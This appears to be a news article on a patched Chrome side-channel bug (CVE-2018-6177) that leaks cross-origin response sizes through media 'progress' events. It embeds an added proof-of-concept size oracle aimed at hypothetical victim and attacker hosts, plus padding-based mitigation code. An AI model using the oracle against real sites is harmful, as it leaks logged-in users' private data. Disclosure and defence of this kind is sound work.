Google has patched a vulnerability in the Chrome browser that allowed an attacker to infer sensitive information from other sites by loading their responses inside audio or video HTML tags.

Ron Masas, a security researcher with Imperva, discovered and reported this issue —tracked as CVE-2018-6177— to Google. The browser maker fixed the security hole at the end of July with the release of Chrome v68.0.3440.75.

The vulnerability can be exploited in older versions of Chrome in situations where an attacker can lure a victim to a malicious site, via malvertising (malicious code inside ads embedded on legitimate sites), or via vulnerabilities on legitimate sites that let an attacker inject and execute code, such as stored cross-site scripting (XSS) flaws.

Attack leverages audio and video HTML tags

In a write-up published earlier today and shared with Bleeping Computer, Masas explained that the attack scenario requires malicious code that loads content from legitimate sites inside audio and video HTML tags.

By counting the "progress" events a media element fires while it loads a cross-origin resource, Masas says he can estimate the size of the response, and from that size infer various types of information about the user.

Under normal circumstances this wouldn't be possible: the same-origin policy (which CORS, Cross-Origin Resource Sharing, exists to relax, not to enforce) stops a page from reading the content of responses fetched from other origins. This attack never reads the content at all. It watches how the browser behaves while fetching it, so the size of the response leaks through a side channel even though the bytes stay out of reach.

"In its essence, the bug allows attackers to estimate the size of cross-origin resources using the video or audio tags," Masas told Bleeping Computer via email today.
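To make the mechanism concrete, here is an added example (mine, not Imperva's or Masas' proof of concept) of a CVE-2018-6177-style size oracle. `probe` and `measure` are browser-only and assume what the article describes, namely that on an unpatched Chrome the number of `progress` events a `<video>` element fires before giving up on a non-media body grows with that body's size. `calibrate` and `estimateBytes` are pure helpers that turn an event count into a byte estimate using files of known size served from an attacker-controlled host; the `attacker.example` and `victim.example` URLs are hypothetical.

```javascript
// Added example of a CVE-2018-6177-style size oracle; not Imperva's PoC.
// Assumption: on unpatched Chrome (< 68.0.3440.75) the number of "progress"
// events a media element fires while loading a cross-origin, non-media
// response grows with the size of that response. The bytes themselves are
// never exposed to the page; only the event count is.

// Browser-only. Load a cross-origin URL in a hidden <video>, count progress
// events until the element settles, and resolve with the count. The request
// carries the victim's cookies, so the response is the logged-in user's view.
function probe(url, { timeoutMs = 5000 } = {}) {
  return new Promise((resolve) => {
    const el = document.createElement('video');
    let count = 0;
    const done = () => {
      clearTimeout(timer);
      el.removeAttribute('src');
      el.remove();
      resolve(count);
    };
    const timer = setTimeout(done, timeoutMs); // never hang on a stalled load
    el.addEventListener('progress', () => { count += 1; });
    el.addEventListener('error', done);   // non-media body: decoder gives up
    el.addEventListener('suspend', done); // browser stopped fetching
    el.preload = 'auto';
    el.style.display = 'none';
    el.src = url;
    document.body.appendChild(el);
  });
}

// Browser-only. A single probe is noisy; repeat it and take the median.
async function measure(url, runs = 5) {
  const counts = [];
  for (let i = 0; i < runs; i++) counts.push(await probe(url));
  return median(counts);
}

// Pure: median of a numeric array.
function median(samples) {
  const s = [...samples].sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Pure: sort calibration points ({bytes, events}) measured against
// attacker-controlled resources of known size, ascending by event count.
function calibrate(points) {
  if (points.length < 2) throw new Error('need at least two calibration points');
  return [...points].sort((a, b) => a.events - b.events);
}

// Pure: turn an observed event count into an estimated byte size by linear
// interpolation between calibration points; clamp outside the calibrated range.
function estimateBytes(calibration, events) {
  const first = calibration[0];
  const last = calibration[calibration.length - 1];
  if (events <= first.events) return first.bytes;
  if (events >= last.events) return last.bytes;
  for (let i = 1; i < calibration.length; i++) {
    const lo = calibration[i - 1];
    const hi = calibration[i];
    if (events <= hi.events) {
      const t = (events - lo.events) / (hi.events - lo.events);
      return lo.bytes + t * (hi.bytes - lo.bytes);
    }
  }
  return last.bytes; // not reached; keeps the function total
}

// Browser entry point with hypothetical hosts; nothing here runs under Node.
if (typeof document !== 'undefined') {
  (async () => {
    // Known-size files served from the attacker's own origin.
    const points = [];
    for (const bytes of [100, 1000, 10000, 100000]) {
      points.push({ bytes, events: await measure(`https://attacker.example/pad/${bytes}.bin`) });
    }
    const cal = calibrate(points);
    // Victim endpoint whose response size depends on the logged-in user.
    const events = await measure('https://victim.example/jsonapi/lasttrade/GOOG');
    console.log('estimated response size (bytes):', estimateBytes(cal, events));
  })();
}
```

The attacker never needs an exact byte count: the calibration only has to be fine enough to separate the handful of response sizes the target endpoint can produce, which is why Masas talks about "big or small responses" rather than raw data.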

Attack can retrieve sensitive/protected data from other sites

In his tests, he was able to determine a user's possible age group and gender by prodding the "Audience Restriction" setting on public Facebook posts.

"By manipulating sites like Facebook to reflect user data in the form of big or small responses, it becomes possible to extract valuable data consistently," Masas told us.

But Mike Gualtieri, a security researcher specializing in web security issues, says the attack can be used in more creative ways than collecting data from Facebook users, for example by targeting corporate backends, intranets, and other enterprise-centric applications.

"Off the shelf systems customized by corporate IT may be the best targets for these types of attacks, as the system internals can be learned by an attacker and could potentially affect all users of the system," Gualtieri told Bleeping Computer today in a private conversation.

"It's very often the case that these systems are more homogeneous based on the logged in user," he said, adding that attackers could prepare attacks focused on exfiltrating sensitive data stored in specific areas of enterprise web apps.

APIs in danger too

Furthermore, Gualtieri believes the attack may also succeed against APIs to which attackers wouldn't normally have access, since the bug lets them relay requests to those APIs through the victim's logged-in browser.

"It's very feasible this day to find weakly protected web APIs communicating data," Gualtieri told us. "An attacker with enough diligence could work out a group of expected requests by logged in users, and target these API responses."

"For example, let's say a hypothetical stock trading firm has an exposed API endpoint that returns something like:

Request: http[:]//victim/jsonapi/lasttrade/GOOG
Response: {"stock" : "GOOG", "lasttrade" : 0, "error" : "not logged in"}

"If the user is logged in the request may be:

{"stock" : "GOOG", "lasttrade" : 100, "error" : false}
or,
{"stock" : "GOOG", "lasttrade" : 1000, "error" : false}

"So, feasibly you could deduce based on this a range of stock purchased," Gualtieri says.

"This example may sound unrealistic to many, but I've seen too many poorly designed/exposed web APIs to know that there are cases similar to this hypothetical example lying around the web," he adds.
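Taking Gualtieri's hypothetical endpoint at face value, the following added example (mine, not his or the article's code) checks whether a size-only oracle separates its three response states, then applies the server-side fix a practitioner would reach for: serialize, then pad every body to one fixed length. The response bodies are constructed from the text above; the function names, the `respondPadded` handler and the 256-byte target are assumptions.

```javascript
// Added example, not from the article: can a size-only oracle separate the
// hypothetical /jsonapi/lasttrade/GOOG response states quoted above, and
// what does padding do about it? Bodies are constructed from the text.
const responses = {
  loggedOut:  { stock: 'GOOG', lasttrade: 0,    error: 'not logged in' },
  smallTrade: { stock: 'GOOG', lasttrade: 100,  error: false },
  largeTrade: { stock: 'GOOG', lasttrade: 1000, error: false },
};

// UTF-8 length, which is what the wire (and therefore the oracle) sees.
function byteLength(s) {
  return new TextEncoder().encode(s).length;
}

// Group states by serialized body length. A state that is alone in its
// group is fully identified by size, which is all CVE-2018-6177 leaks.
function sizeClasses(variants, serialize = JSON.stringify) {
  const classes = new Map();
  for (const [name, body] of Object.entries(variants)) {
    const len = byteLength(serialize(body));
    if (!classes.has(len)) classes.set(len, []);
    classes.get(len).push(name);
  }
  return classes;
}

// True if at least one state can be singled out by response size alone.
function leaksState(variants, serialize = JSON.stringify) {
  return [...sizeClasses(variants, serialize).values()].some((g) => g.length === 1);
}

// Mitigation: pad the serialized body with trailing spaces to a fixed length.
// JSON permits trailing whitespace, so JSON.parse returns the same value.
// Choose the target above the largest legitimate body; refuse rather than
// emit an oversized (and therefore distinguishable) response.
function padJson(body, targetBytes = 256) {
  const raw = JSON.stringify(body);
  const len = byteLength(raw);
  if (len > targetBytes) {
    throw new Error(`body is ${len} bytes, above the ${targetBytes}-byte padding target`);
  }
  return raw + ' '.repeat(targetBytes - len);
}

// Hypothetical handler with a Node http-style response object.
function respondPadded(res, body) {
  const payload = padJson(body);
  res.writeHead(200, {
    'Content-Type': 'application/json; charset=utf-8',
    'Content-Length': String(byteLength(payload)),
    'Cache-Control': 'no-store',
    // Honoured by browsers from 2019 on: a <video>/<audio> element on another
    // origin does not receive this body at all.
    'Cross-Origin-Resource-Policy': 'same-origin',
  });
  res.end(payload);
}

console.log('sizes as served:', [...sizeClasses(responses).entries()]);
console.log('distinguishable as served:', leaksState(responses));                        // true
console.log('distinguishable once padded:', leaksState(responses, (b) => padJson(b)));    // false
```

Two caveats on the padding. It must be applied after compression, or the endpoint must be served without `Content-Encoding`, because a run of trailing spaces gzips down to almost nothing and the size signal returns. And the fixed length has to cover every legitimate body, including error and unauthenticated variants, since the "not logged in" response is exactly the state the oracle wants to tell apart.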

Attack similar to Wavethrough, but different

If Masas' attack sounds familiar, it's because it is very similar to a vulnerability disclosed in June, known as Wavethrough (CVE-2018-8235), a flaw affecting Edge and Firefox.

Just like Masas' Chrome bug, Wavethrough abused audio and video tags to get at cross-origin data that the same-origin policy should have kept out of the attacker's reach.

But this is where the similarity stops.

"The Wavethrough vulnerability used a service worker and 'range' request to extract raw data," Masas told Bleeping Computer. "We, on the other hand, observe the 'progress' events fired from our element to estimate a cross-origin resource size and then use this information to deduce more information about users by exploiting the restriction filters on sites like Facebook."

Jake Archibald, the Google engineer who discovered Wavethrough, also says the two attacks are quite different, even if both are carried out via audio and video HTML tags.

"It's very slightly similar, but it's more of a timing attack whereas Wavethrough wasn't," Archibald told Bleeping Computer in a private conversation today. "Wavethrough was an origin-model violation."

The difference is that Wavethrough actually read the raw bytes of the cross-origin response, while Masas' flaw never sees the data: it is a side channel that fires many requests at the target and infers, from how large each response was, which of several known states the user is in.

But while the Chrome bug sounds harder to exploit, it is not.

"The attack is not complex and just takes some preparation," Gualtieri told us, also adding that this constant guessing game doesn't mean that the Chrome bug is limited to targeting one user alone.

"The guessing game may be used to target multiple users at once depending on the target site," Gualtieri said.

So, unless users want to have their web secrets leaked online, updating Chrome to v68.0.3440.75 or later is recommended.